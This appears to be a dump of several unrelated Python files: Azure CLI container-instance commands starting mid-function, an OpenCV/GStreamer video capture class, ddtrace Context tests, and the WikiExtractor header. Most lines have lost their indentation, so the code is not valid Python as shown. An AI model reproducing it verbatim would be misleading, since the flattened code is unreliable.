vnet = _get_resource(ncf.virtual_networks, resource_group_name, vnet_name)
if not vnet:
logger.info('Creating new vnet "%s" in resource group "%s"', vnet_name, resource_group_name)
ncf.virtual_networks.create_or_update(resource_group_name,
vnet_name,
VirtualNetwork(name=vnet_name,
location=location,
address_space=AddressSpace(address_prefixes=[vnet_address_prefix])))
subnet = Subnet(
name=subnet_name,
location=location,
address_prefix=subnet_address_prefix,
delegations=[aci_delegation])
logger.info('Creating new subnet "%s" in resource group "%s"', subnet_name, resource_group_name)
subnet = ncf.subnets.create_or_update(resource_group_name, vnet_name, subnet_name, subnet).result()
NetworkProfile, ContainerNetworkInterfaceConfiguration, IPConfigurationProfile = cmd.get_models('NetworkProfile',
'ContainerNetworkInterfaceConfiguration',
'IPConfigurationProfile',
resource_type=ResourceType.MGMT_NETWORK)
# In all cases, create the network profile with aci NIC
network_profile = NetworkProfile(
name=default_network_profile_name,
location=location,
container_network_interface_configurations=[ContainerNetworkInterfaceConfiguration(
name="eth0",
ip_configurations=[IPConfigurationProfile(
name="ipconfigprofile",
subnet=subnet
)]
)]
)
logger.info('Creating network profile "%s" in resource group "%s"', default_network_profile_name, resource_group_name)
network_profile = ncf.network_profiles.create_or_update(resource_group_name, default_network_profile_name, network_profile).result()
return network_profile.id
def _get_diagnostics_from_workspace(cli_ctx, log_analytics_workspace):
from msrestazure.tools import parse_resource_id
log_analytics_workspace_client = cf_log_analytics_workspace(cli_ctx)
log_analytics_workspace_shared_keys_client = cf_log_analytics_workspace_shared_keys(cli_ctx)
for workspace in log_analytics_workspace_client.list():
if log_analytics_workspace in (workspace.name, workspace.customer_id):
keys = log_analytics_workspace_shared_keys_client.get_shared_keys(
parse_resource_id(workspace.id)['resource_group'], workspace.name)
log_analytics = LogAnalytics(
workspace_id=workspace.customer_id, workspace_key=keys.primary_shared_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics)
return (diagnostics, {'oms-resource-link': workspace.id})
return None, {}
def _create_update_from_file(cli_ctx, resource_group_name, name, location, file, no_wait):
resource_client = cf_resource(cli_ctx)
container_group_client = cf_container_groups(cli_ctx)
cg_defintion = None
try:
with open(file, 'r') as f:
cg_defintion = yaml.safe_load(f)
except OSError: # FileNotFoundError introduced in Python 3
raise CLIError("No such file or directory: " + file)
except yaml.YAMLError as e:
raise CLIError("Error while parsing yaml file:\n\n" + str(e))
# Validate names match if both are provided
if name and cg_defintion.get('name', None):
if name != cg_defintion.get('name', None):
raise CLIError("The name parameter and name from yaml definition must match.")
else:
# Validate at least one name is provided
name = name or cg_defintion.get('name', None)
if cg_defintion.get('name', None) is None and not name:
raise CLIError("The name of the container group is required")
cg_defintion['name'] = name
location = location or cg_defintion.get('location', None)
if not location:
location = resource_client.resource_groups.get(resource_group_name).location
cg_defintion['location'] = location
api_version = cg_defintion.get('apiVersion', None) or container_group_client.api_version
return sdk_no_wait(no_wait,
resource_client.resources.create_or_update,
resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
api_version,
cg_defintion)
# pylint: disable=inconsistent-return-statements
def _create_resource_requirements(cpu, memory):
"""Create resource requirements. """
if cpu or memory:
container_resource_requests = ResourceRequests(memory_in_gb=memory, cpu=cpu)
return ResourceRequirements(requests=container_resource_requests)
def _create_image_registry_credentials(registry_login_server, registry_username, registry_password, image):
"""Create image registry credentials. """
image_registry_credentials = None
if registry_login_server:
if not registry_username:
raise CLIError('Please specify --registry-username in order to use custom image registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use custom image registry.')
image_registry_credentials = [ImageRegistryCredential(server=registry_login_server,
username=registry_username,
password=registry_password)]
elif ACR_SERVER_DELIMITER in image.split("/")[0]:
if not registry_username:
try:
registry_username = prompt(msg='Image registry username: ')
except NoTTYException:
raise CLIError('Please specify --registry-username in order to use Azure Container Registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use Azure Container Registry.')
acr_server = image.split("/")[0] if image.split("/") else None
if acr_server:
image_registry_credentials = [ImageRegistryCredential(server=acr_server,
username=registry_username,
password=registry_password)]
elif registry_username and registry_password and SERVER_DELIMITER in image.split("/")[0]:
login_server = image.split("/")[0] if image.split("/") else None
if login_server:
image_registry_credentials = [ImageRegistryCredential(server=login_server,
username=registry_username,
password=registry_password)]
else:
raise CLIError('Failed to parse login server from image name; please explicitly specify --registry-server.')
return image_registry_credentials
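# When --registry-login-server is not given, the branch taken depends on the image
# name (examples are hypothetical):
#   'myregistry.azurecr.io/app:v1' -> ACR branch, prompts for any missing credentials
#   'registry.example.com/app:v1'  -> generic registry branch, used only when both
#                                     --registry-username and --registry-password are supplied
#   'nginx'                        -> no image registry credentials attached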
def _create_azure_file_volume(azure_file_volume_share_name, azure_file_volume_account_name, azure_file_volume_account_key):
"""Create Azure File volume. """
azure_file_volume = None
if azure_file_volume_share_name:
if not azure_file_volume_account_name:
raise CLIError('Please specify --azure-file-volume-account-name in order to use Azure File volume.')
if not azure_file_volume_account_key:
try:
azure_file_volume_account_key = prompt_pass(msg='Azure File storage account key: ')
except NoTTYException:
raise CLIError('Please specify --azure-file-volume-account-key in order to use Azure File volume.')
azure_file_volume = AzureFileVolume(share_name=azure_file_volume_share_name,
storage_account_name=azure_file_volume_account_name,
storage_account_key=azure_file_volume_account_key)
return Volume(name=AZURE_FILE_VOLUME_NAME, azure_file=azure_file_volume) if azure_file_volume else None
def _create_secrets_volume(secrets):
"""Create secrets volume. """
return Volume(name=SECRETS_VOLUME_NAME, secret=secrets) if secrets else None
def _create_gitrepo_volume(gitrepo_url, gitrepo_dir, gitrepo_revision):
"""Create Git Repo volume. """
gitrepo_volume = GitRepoVolume(repository=gitrepo_url, directory=gitrepo_dir, revision=gitrepo_revision)
return Volume(name=GITREPO_VOLUME_NAME, git_repo=gitrepo_volume) if gitrepo_url else None
# pylint: disable=inconsistent-return-statements
def _create_azure_file_volume_mount(azure_file_volume, azure_file_volume_mount_path):
"""Create Azure File volume mount. """
if azure_file_volume_mount_path:
if not azure_file_volume:
raise CLIError('Please specify --azure-file-volume-share-name --azure-file-volume-account-name --azure-file-volume-account-key '
'to enable Azure File volume mount.')
return VolumeMount(name=AZURE_FILE_VOLUME_NAME, mount_path=azure_file_volume_mount_path)
def _create_secrets_volume_mount(secrets_volume, secrets_mount_path):
"""Create secrets volume mount. """
if secrets_volume:
if not secrets_mount_path:
raise CLIError('Please specify --secrets --secrets-mount-path '
'to enable secrets volume mount.')
return VolumeMount(name=SECRETS_VOLUME_NAME, mount_path=secrets_mount_path)
def _create_gitrepo_volume_mount(gitrepo_volume, gitrepo_mount_path):
"""Create Git Repo volume mount. """
if gitrepo_mount_path:
if not gitrepo_volume:
raise CLIError('Please specify --gitrepo-url (--gitrepo-dir --gitrepo-revision) '
'to enable Git Repo volume mount.')
return VolumeMount(name=GITREPO_VOLUME_NAME, mount_path=gitrepo_mount_path)
# pylint: disable=inconsistent-return-statements
def _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile):
"""Create IP address. """
if (ip_address and ip_address.lower() == 'public') or dns_name_label:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
dns_name_label=dns_name_label, type=ContainerGroupIpAddressType.public)
if network_profile:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
type=ContainerGroupIpAddressType.private)
# pylint: disable=inconsistent-return-statements
def container_logs(cmd, resource_group_name, name, container_name=None, follow=False):
"""Tail a container instance log. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
if not follow:
log = container_client.list_logs(resource_group_name, name, container_name)
print(log.content)
else:
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
            shutdown_grace_period=5,
stream_target=_stream_logs,
stream_args=(container_client, resource_group_name, name, container_name, container_group.restart_policy))
def container_export(cmd, resource_group_name, name, file):
resource_client = cf_resource(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
resource = resource_client.resources.get(resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
container_group_client.api_version,
False).__dict__
    # Remove unwanted properties
resource['properties'].pop('instanceView', None)
resource.pop('sku', None)
resource.pop('id', None)
resource.pop('plan', None)
resource.pop('kind', None)
resource.pop('managed_by', None)
resource['properties'].pop('provisioningState', None)
# Correctly export the identity
try:
identity = resource['identity'].type
if identity != ResourceIdentityType.none:
resource['identity'] = resource['identity'].__dict__
identity_entry = {'type': resource['identity']['type'].value}
if resource['identity']['user_assigned_identities']:
identity_entry['user_assigned_identities'] = {k: {} for k in resource['identity']['user_assigned_identities']}
resource['identity'] = identity_entry
except (KeyError, AttributeError):
        resource.pop('identity', None)
# Remove container instance views
for i in range(len(resource['properties']['containers'])):
resource['properties']['containers'][i]['properties'].pop('instanceView', None)
# Add the api version
resource['apiVersion'] = container_group_client.api_version
with open(file, 'w+') as f:
yaml.safe_dump(resource, f, default_flow_style=False)
def container_exec(cmd, resource_group_name, name, exec_command, container_name=None, terminal_row_size=20, terminal_col_size=80):
"""Start exec for a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
if container_name or container_name is None and len(container_group.containers) == 1:
# If only one container in container group, use that container.
if container_name is None:
container_name = container_group.containers[0].name
terminal_size = ContainerExecRequestTerminalSize(rows=terminal_row_size, cols=terminal_col_size)
execContainerResponse = container_client.execute_command(resource_group_name, name, container_name, exec_command, terminal_size)
        if platform.system() == WINDOWS_NAME:
_start_exec_pipe_win(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
_start_exec_pipe(execContainerResponse.web_socket_uri, execContainerResponse.password)
else:
raise CLIError('--container-name required when container group has more than one container.')
def _start_exec_pipe_win(web_socket_uri, password):
def _on_ws_open(ws):
ws.send(password)
t = threading.Thread(target=_capture_stdin, args=[ws])
t.daemon = True
t.start()
ws = websocket.WebSocketApp(web_socket_uri, on_open=_on_ws_open, on_message=_on_ws_msg)
ws.run_forever()
def _on_ws_msg(ws, msg):
sys.stdout.write(msg)
sys.stdout.flush()
def _capture_stdin(ws):
while True:
        if msvcrt.kbhit():
x = msvcrt.getch()
ws.send(x)
def _start_exec_pipe(web_socket_uri, password):
ws = websocket.create_connection(web_socket_uri)
oldtty = termios.tcgetattr(sys.stdin)
old_handler = signal.getsignal(signal.SIGWINCH)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
ws.send(password)
while True:
try:
if not _cycle_exec_pipe(ws):
break
except (select.error, IOError) as e:
if e.args and e.args[0] == errno.EINTR:
pass
else:
raise
except websocket.WebSocketException:
pass
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
signal.signal(signal.SIGWINCH, old_handler)
def _cycle_exec_pipe(ws):
r, _, _ = select.select([ws.sock, sys.stdin], [], [])
if ws.sock in r:
data = ws.recv()
if not data:
return False
sys.stdout.write(data)
sys.stdout.flush()
if sys.stdin in r:
x = sys.stdin.read(1)
if not x:
return True
ws.send(x)
return True
def attach_to_container(cmd, resource_group_name, name, container_name=None):
"""Attach to a container. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
        shutdown_grace_period=5,
stream_target=_stream_container_events_and_logs,
stream_args=(container_group_client, container_client, resource_group_name, name, container_name))
def _start_streaming(terminate_condition, terminate_condition_args, shutdown_grace_period, stream_target, stream_args):
"""Start streaming for the stream target. """
import colorama
colorama.init()
try:
t = threading.Thread(target=stream_target, args=stream_args)
t.daemon = True
t.start()
while not terminate_condition(*terminate_condition_args) and t.is_alive():
time.sleep(10)
        time.sleep(shutdown_grace_period)
finally:
colorama.deinit()
def _stream_logs(client, resource_group_name, name, container_name, restart_policy):
"""Stream logs for a container. """
lastOutputLines = 0
while True:
log = client.list_logs(resource_group_name, name, container_name)
lines = log.content.split('\n')
currentOutputLines = len(lines)
# Should only happen when the container restarts.
if currentOutputLines < lastOutputLines and restart_policy != 'Never':
print("Warning: you're having '--restart-policy={}'; the container '{}' was just restarted; the tail of the current log might be missing. Exiting...".format(restart_policy, container_name))
break
_move_console_cursor_up(lastOutputLines)
print(log.content)
lastOutputLines = currentOutputLines
time.sleep(2)
def _stream_container_events_and_logs(container_group_client, container_client, resource_group_name, name, container_name):
"""Stream container events and logs. """
lastOutputLines = 0
lastContainerState = None
while True:
container_group, container = _find_container(container_group_client, resource_group_name, name, container_name)
container_state = 'Unknown'
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state:
container_state = container.instance_view.current_state.state
_move_console_cursor_up(lastOutputLines)
if container_state != lastContainerState:
print("Container '{}' is in state '{}'...".format(container_name, container_state))
currentOutputLines = 0
if container.instance_view and container.instance_view.events:
for event in sorted(container.instance_view.events, key=lambda e: e.last_timestamp):
print('(count: {}) (last timestamp: {}) {}'.format(event.count, event.last_timestamp, event.message))
currentOutputLines += 1
lastOutputLines = currentOutputLines
lastContainerState = container_state
if container_state == 'Running':
print('\nStart streaming logs:')
break
time.sleep(2)
_stream_logs(container_client, resource_group_name, name, container_name, container_group.restart_policy)
def _is_container_terminated(client, resource_group_name, name, container_name):
"""Check if a container should be considered terminated. """
container_group, container = _find_container(client, resource_group_name, name, container_name)
# If a container group is terminated, assume the container is also terminated.
if container_group.instance_view and container_group.instance_view.state:
if container_group.instance_view.state == 'Succeeded' or container_group.instance_view.state == 'Failed':
return True
# If the restart policy is Always, assume the container will be restarted.
if container_group.restart_policy:
if container_group.restart_policy == 'Always':
return False
# Only assume the container is terminated if its state is Terminated.
if container.instance_view and container.instance_view.current_state and container.instance_view.current_state.state == 'Terminated':
return True
return False
def _find_container(client, resource_group_name, name, container_name):
"""Find a container in a container group. """
container_group = client.get(resource_group_name, name)
containers = [c for c in container_group.containers if c.name == container_name]
if len(containers) != 1:
raise CLIError("Found 0 or more than 1 container with name '{}'".format(container_name))
return container_group, containers[0]
def _move_console_cursor_up(lines):
"""Move console cursor up. """
if lines > 0:
# Use stdout.write to support Python 2
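        # '\x1b[{n}A' moves the cursor up n lines, '\x1b[K' clears from the cursor
        # to the end of the line, and '\x1b[J' clears to the end of the screen,
        # so the next print overwrites the previous output in place.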
sys.stdout.write('\033[{}A\033[K\033[J'.format(lines))
def _gen_guid():
import uuid
return uuid.uuid4()
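# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the CLI command surface): the
# "print, rewind, reprint" technique used by _stream_logs above, applied to
# any callable that returns the full log text accumulated so far.
# `get_full_log` and `poll_interval` are hypothetical names used only here.
def _demo_tail_in_place(get_full_log, poll_interval=2):
    last_lines = 0
    while True:
        content = get_full_log()
        _move_console_cursor_up(last_lines)  # rewind over the previous print
        print(content)
        last_lines = len(content.split('\n'))
        time.sleep(poll_interval)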
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
from urllib.parse import urlparse
import subprocess
import threading
import logging
import cv2
LOGGER = logging.getLogger(__name__)
WITH_GSTREAMER = False  # toggle to True to use the GStreamer backend
class Protocol(Enum):
IMAGE = 0
VIDEO = 1
CSI = 2
V4L2 = 3
RTSP = 4
HTTP = 5
class VideoIO:
def __init__(self, size, input_uri,
output_uri=None,
resolution=(1920, 1080),
frame_rate=30,
buffer_size=10,
proc_fps=30):
"""Class for video capturing and output saving.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : tuple
Width and height of each frame to output.
input_uri : str
            URI of the input stream. It can be an image sequence (e.g. '%06d.jpg'), a video file (e.g. 'file.mp4'),
            a MIPI CSI camera (e.g. 'csi://0'), a USB/V4L2 camera (e.g. '/dev/video0'),
            an RTSP stream (e.g. 'rtsp://<user>:<password>@<ip>:<port>/<path>'),
            or an HTTP live stream (e.g. 'http://<user>:<password>@<ip>:<port>/<path>').
        output_uri : str, optional
URI to an output video file.
resolution : tuple, optional
Original resolution of the input source.
Useful to set a certain capture mode of a USB/CSI camera.
frame_rate : int, optional
Frame rate of the input source.
Required if frame rate cannot be deduced, e.g. image sequence and/or RTSP.
Useful to set a certain capture mode of a USB/CSI camera.
buffer_size : int, optional
Number of frames to buffer.
            For live sources, a larger buffer drops fewer frames but increases latency.
proc_fps : int, optional
Estimated processing speed that may limit the capture interval `cap_dt`.
This depends on hardware and processing complexity.
"""
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.resolution = resolution
assert frame_rate > 0
self.frame_rate = frame_rate
assert buffer_size >= 1
self.buffer_size = buffer_size
assert proc_fps > 0
self.proc_fps = proc_fps
self.protocol = self._parse_uri(self.input_uri)
self.is_live = self.protocol != Protocol.IMAGE and self.protocol != Protocol.VIDEO
if WITH_GSTREAMER:
self.source = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.source = cv2.VideoCapture(self.input_uri)
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.cap_thread = threading.Thread(target=self._capture_frames)
ret, frame = self.source.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.source.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.source.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.cap_fps = self.source.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.cap_fps == 0:
self.cap_fps = self.frame_rate # fallback to config if unknown
LOGGER.info('%dx%d stream @ %d FPS', width, height, self.cap_fps)
if self.output_uri is not None:
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.cap_dt
if WITH_GSTREAMER:
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
@property
def cap_dt(self):
# limit capture interval at processing latency for live sources
return 1 / min(self.cap_fps, self.proc_fps) if self.is_live else 1 / self.cap_fps
def start_capture(self):
"""Start capturing from file or device."""
if not self.source.isOpened():
self.source.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.cap_thread.is_alive():
self.cap_thread.start()
def stop_capture(self):
"""Stop capturing from file or device."""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.cap_thread.join()
def read(self):
"""Reads the next video frame.
Returns
-------
        ndarray or None
            The next video frame, or None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
"""Writes the next video frame."""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
"""Cleans up input and output sources."""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.source.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! '
'video/x-raw, width=%d, height=%d, format=BGRx !'
'videoconvert ! appsink sync=false'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=%d, height=%d !'
'videoconvert ! appsink sync=false'
% self.size
)
if self.protocol == Protocol.IMAGE:
pipeline = (
'multifilesrc location=%s index=1 caps="image/%s,framerate=%d/1" ! decodebin ! '
% (
self.input_uri,
self._img_format(self.input_uri),
self.frame_rate
)
)
elif self.protocol == Protocol.VIDEO:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=%d, height=%d, '
'format=NV12, framerate=%d/1 ! '
% (
self.input_uri[6:],
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=%d, height=%d, '
'format=YUY2, framerate=%d/1 ! '
% (
self.input_uri,
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = (
'rtspsrc location=%s latency=0 ! '
'capsfilter caps=application/x-rtp,media=video ! decodebin ! ' % self.input_uri
)
elif self.protocol == Protocol.HTTP:
pipeline = 'souphttpsrc location=%s is-live=true ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc preset-level=2'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc pass=4'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.source.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for file
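                # (for live sources, the deque's maxlen drops the oldest frame
                # instead of blocking the capture thread)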
if not self.is_live:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
result = urlparse(uri)
if result.scheme == 'csi':
protocol = Protocol.CSI
elif result.scheme == 'rtsp':
protocol = Protocol.RTSP
elif result.scheme == 'http':
protocol = Protocol.HTTP
else:
if '/dev/video' in result.path:
protocol = Protocol.V4L2
elif '%' in result.path:
protocol = Protocol.IMAGE
else:
protocol = Protocol.VIDEO
return protocol
@staticmethod
def _img_format(uri):
img_format = Path(uri).suffix[1:]
return 'jpeg' if img_format == 'jpg' else img_format
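# -----------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module). The file names below
# are placeholders and the per-frame processing step is intentionally left out.
if __name__ == '__main__':
    stream = VideoIO((1280, 720), 'input.mp4', output_uri='out/result.mp4')
    stream.start_capture()
    try:
        while True:
            frame = stream.read()
            if frame is None:
                break
            # ... run per-frame processing (detection, tracking, ...) here ...
            stream.write(frame)
    finally:
        stream.release()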
|
test_context.py
|
import logging
import threading
import mock
import pytest
from ddtrace.context import Context
from ddtrace.ext.priority import AUTO_KEEP
from ddtrace.ext.priority import AUTO_REJECT
from ddtrace.ext.priority import USER_KEEP
from ddtrace.ext.priority import USER_REJECT
from ddtrace.span import Span
from tests import BaseTestCase
from tests import DummyTracer
@pytest.fixture
def tracer_with_debug_logging():
    # All the tracers, dummy or not, share the same logging object.
tracer = DummyTracer()
level = tracer.log.level
tracer.log.setLevel(logging.DEBUG)
try:
yield tracer
finally:
tracer.log.setLevel(level)
class TestTracingContext(BaseTestCase):
"""
Tests related to the ``Context`` class that hosts the trace for the
current execution flow.
"""
def test_add_span(self):
# it should add multiple spans
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
assert 1 == len(ctx._trace)
assert "fake_span" == ctx._trace[0].name
assert ctx == span.context
def test_context_sampled(self):
# a context is sampled if the spans are sampled
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
span.finished = True
trace, sampled = ctx.close_span(span)
assert sampled is True
assert ctx.sampling_priority is None
def test_context_priority(self):
        # setting the sampling priority must not affect the sampled status
ctx = Context()
for priority in [USER_REJECT, AUTO_REJECT, AUTO_KEEP, USER_KEEP, None, 999]:
ctx.sampling_priority = priority
span = Span(tracer=None, name=("fake_span_%s" % repr(priority)))
ctx.add_span(span)
span.finished = True
# It's "normal" to have sampled be true even when priority sampling is
            # set to 0 or -1. It would stay false even with priority set to 2.
# The only criteria to send (or not) the spans to the agent should be
# this "sampled" attribute, as it's tightly related to the trace weight.
assert priority == ctx.sampling_priority
trace, sampled = ctx.close_span(span)
assert sampled is True, "priority has no impact on sampled status"
def test_current_span(self):
# it should return the current active span
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
assert span == ctx.get_current_span()
def test_current_root_span_none(self):
# it should return none when there is no root span
ctx = Context()
assert ctx.get_current_root_span() is None
def test_current_root_span(self):
# it should return the current active root span
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
assert span == ctx.get_current_root_span()
def test_close_span(self):
# it should keep track of closed spans, moving
# the current active to its parent
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
ctx.close_span(span)
assert ctx.get_current_span() is None
def test_get_trace(self):
# it should return the internal trace structure
# if the context is finished
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
span.finished = True
trace, sampled = ctx.close_span(span)
assert [span] == trace
assert sampled is True
# the context should be empty
assert 0 == len(ctx._trace)
assert ctx._current_span is None
def test_finished(self):
# a Context is finished if all spans inside are finished
ctx = Context()
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
ctx.close_span(span)
@mock.patch("logging.Logger.debug")
def test_log_unfinished_spans_disabled(self, log):
# the trace finished status logging is disabled
tracer = DummyTracer()
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name="root")
child_1 = Span(tracer=tracer, name="child_1", trace_id=root.trace_id, parent_id=root.span_id)
child_2 = Span(tracer=tracer, name="child_2", trace_id=root.trace_id, parent_id=root.span_id)
child_1._parent = root
child_2._parent = root
ctx.add_span(root)
ctx.add_span(child_1)
ctx.add_span(child_2)
# close only the parent
root.finish()
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
assert "the trace has %d unfinished spans" not in msg
@mock.patch("logging.Logger.debug")
def test_log_unfinished_spans_when_ok(self, log):
# if the unfinished spans logging is enabled but the trace is finished, don't log anything
tracer = DummyTracer()
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name="root")
child = Span(tracer=tracer, name="child_1", trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
# close the trace
child.finish()
root.finish()
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
assert "the trace has %d unfinished spans" not in msg
def test_thread_safe(self):
# the Context must be thread-safe
ctx = Context()
def _fill_ctx():
span = Span(tracer=None, name="fake_span")
ctx.add_span(span)
threads = [threading.Thread(target=_fill_ctx) for _ in range(100)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
assert 100 == len(ctx._trace)
def test_clone(self):
ctx = Context()
ctx.sampling_priority = 2
# manually create a root-child trace
root = Span(tracer=None, name="root")
child = Span(tracer=None, name="child_1", trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
cloned_ctx = ctx.clone()
assert cloned_ctx._parent_trace_id == ctx._parent_trace_id
assert cloned_ctx._parent_span_id == ctx._parent_span_id
assert cloned_ctx._sampling_priority == ctx._sampling_priority
assert cloned_ctx.dd_origin == ctx.dd_origin
assert cloned_ctx._current_span == ctx._current_span
assert cloned_ctx._trace == []
|
WikiExtractor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# Version: 3.0 (July 22, 2020)
# Author: Giuseppe Attardi (attardi@di.unipi.it), University of Pisa
#
# Contributors:
# Antonio Fuschetto (fuschett@aol.com)
# Leonardo Souza (lsouza@amtera.com.br)
# Juan Manuel Caicedo (juan@cavorite.com)
# Humberto Pereira (begini@gmail.com)
# Siegfried-A. Gevatter (siegfried@gevatter.com)
# Pedro Assis (pedroh2306@gmail.com)
# Wim Muskee (wimmuskee@gmail.com)
# Radics Geza (radicsge@gmail.com)
# Nick Ulven (nulven@github)
#
# =============================================================================
# Copyright (c) 2009-2020. Giuseppe Attardi (attardi@di.unipi.it).
# =============================================================================
# This file is part of Tanl.
#
# Tanl is free software; you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# Tanl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# =============================================================================
"""Wikipedia Extractor:
Extracts and cleans text from a Wikipedia database dump and stores output in a
number of files of similar size in a given directory.
Each file will contain several documents in the format:
<doc id="" url="" title="">
...
</doc>
If the program is invoked with the --json flag, then each file will
contain several documents formatted as json objects, one per line, with
the following structure
{"id": "", "revid": "", "url": "", "title": "", "text": "..."}
The program performs template expansion by preprocessing the whole dump and
collecting template definitions.
"""
import argparse
import bz2
import logging
import os.path
import re  # TODO: use the 'regex' module when it becomes standard
import sys
from io import StringIO
from multiprocessing import Queue, get_context, cpu_count
from timeit import default_timer
from .extract import Extractor, ignoreTag, define_template, acceptedNamespaces
# ===========================================================================
# Program version
__version__ = '3.0.6'
##
# Defined in <siteinfo>
# 'Template' is included by default when loading an external template file.
knownNamespaces = set(['Template'])
##
